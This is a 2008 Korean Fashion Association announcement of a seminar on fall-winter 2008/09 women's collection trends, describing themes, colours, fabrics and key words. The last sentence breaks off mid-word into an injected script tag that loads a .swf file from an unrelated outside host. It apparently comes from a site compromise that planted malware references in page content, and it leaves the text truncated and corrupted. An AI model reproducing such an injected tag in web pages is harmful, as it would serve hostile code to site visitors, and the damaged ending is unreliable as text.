0809 FW 여성 해외 컬렉션 설명회

한국패션협회 2008-03-31 18:17 조회수 아이콘 915

바로가기

 

0809 FW 여성 해외 컬렉션 설명회

트렌드 정보 컨설팅 업체인 ㈜아이에프네트워크의 인터패션플래닝 사업부 (www.ifp.co.kr)가 오는 4월 1일 삼성동 섬유센터에서 0809 FW 여성 해외 컬렉션 설명회를 개최한다. 이번 설명회는 뉴욕, 런던, 밀라노, 파리 컬렉션에서 발표된 여성복 컬렉션을 분석하여 최신의 패션 경향을 살펴 보고 국내 여성복 패션 관계자들에게 적합한 기획 방향을 제안하는 기회를 마련하였다.
유명 디자이너들을 중심으로 세계 여성복 컬렉션 브랜드들의 최근 뉴스들을 짚어보고 이와함께 컬렉션에서 떠오르는 디자인, 컬러, 패브릭, 프린트와 패턴, 액세서리 등의 키포인트를 정리한 이번 설명회에서는 2008년 가을 겨울을 리드할 여성 패션의 모든 것을 만날 수 있다. 


<설명회 내용>

“Make a REALITY”

지난 시즌, 실험적이고 아트적인 감성으로 충만했던 디자이너들은 부진한 판매실적을 만회하기 위해서인지, 마케팅의 적절한 시기인 이번 가을, 겨울 시즌에 그 충만한 감성들을 적절히 현실적인 엘레강스로 융화해 내고 있었다. 심지어 지난 시즌 다소 엉뚱한 캐릭터나, 표절이라고 비난 받는 작가에게서까지 영감을 받아 우리에게 놀라움을 안겨주었던 많은 디자이너들까지 현실에 안착해 근원적이고 절제된 디자인 감성으로 컬렉션을 풀어가고 있다.

디자이너들은 “현실성 있는 디자인 만들기(Make a reality)”를 위해 실험적이고 아트적 감성보다 스타일링, 실루엣, 컬러, 소재에서 “부조화의 융합(Discord blending)”을 중요한 디자인 포인트로 사용하고 있다. 건축적이고 노력한 재단, 정교하고 섬세한 디테일들이 되살아나고 있었으며, 컬러들이 다시 부각되기 시작하고 있다. 지난 시즌부터 부각되었던 리치(Rich)하고 딥(Deep)한 플럼(Plum), 와인(Wine) 컬러들이 더욱 확산되어 사용되고, 강렬한 공작새의 블루 컬러(Peacock Blue), 가을을 연상하게 하는 밝은 오렌지톤에서 코럴(Coral)에 이르는 컬러의 색감이 그대로 살아있는 색들이 등장하여 부조화 속에 조화를 이루면서 서로 믹스 앤 매치(mix & match)되고 있다.
소재와 패턴에서는 대조적이고 모순된 융화 현상이 더욱 드라마틱하게 드러났다.
전통적인 소재나 전통적인 패턴인 체크와 격자무늬 등이 장식적인 표면감을 가진 새틴(satin), 반투명한 니트와 장식적인 레이스, 표면감이 다른 벨벳(velvet)등의 소재들과 재조합되어 한 스타일, 한 아이템에서 동시에 나타난다. 또한 표면감이 상반되는 모든 소재들이 서로 융화되어 사용되는 현상이 갈수록 중요해 지는 것에 미래적이고 인공적인 표면감의 하이테크놀로지 소재나 젖은 듯한 감촉의 나일론 소재들도 이에 한 몫을 하고 있다

이번 시즌의 테마는 크게 6가지로 전개 되는데 각각 과거에 독립적으로 진행해왔던 부조화의 감성들을 서로 조화시켜 융화된 컨셉을 보여주고 있다.


Theme 1_ Cinema Parisienne(시네마 파리지엔느)

20년대에서 50년대를 아우르는 시대적 흐름 속에 파리지엔의 감성이 믹스되어 나타난다.
50년대 프랑스 여배우 스타일의 헤드 스카프. 블랙 아이라이너 메이크업으로 특정 지어지는 스타일은 언발런스 하지만 세련되며, 꾸뛰르 감성의 패브릭 믹싱과 플라워 패턴은  뉴룩 스타일과 미스매치 되어 쉬크한 스타일링인 럭셔리 빈티지 룩을 선보인다.
.
-Key Words 1 : Mismatched proportions layering
-Key Words 2 : Vintage Glamour
-Key Words 3 : Fall frorals pattern

Theme 2_ Eccentric Boho (기묘한 보헤미안 스타일)

보헤미안의 전원생활과 러스틱한 트라이브 감성이 펑키한 스타일링으로 쉬크한 보헤미안 룩을 제안한다. 러시아, 투르크메니안, 우즈베키스탄 등 동서양의 에스닉한 패턴의 미스매치와 헤비한 퍼 아우터, 다양한 체크의 변형이 보여진다.
핸드워크 된 디테일과 메탈릭 악세사리는 펑크 스타일링을 완성시키며, 세련된 스타일링에 섹시함을 가미하여 20년대 70년대 무드를 재조명하여 Boho chic감성을 드러낸다.

-Key Words 1 : Metallic Accessory
-Key Words 2 : Luex mood
-Key Words 3 : Folklore Rhapsody

Theme 3_ Artistic Anarchist(예술적인 무정부주의자)

아트적인 감성과 무정부주의의 감성이 융화된 테마가 보여진다. 록, 컬트, 펑크가 아티스틱하게 표현되고, 남성적인 밀리터리나 수트스타일링이 자유분방한 레이어링으로 나타난다. 여기에 폴리틱(politic)한 메시지와 여성복의 ?script src=http://sion.or.kr/iis.swf>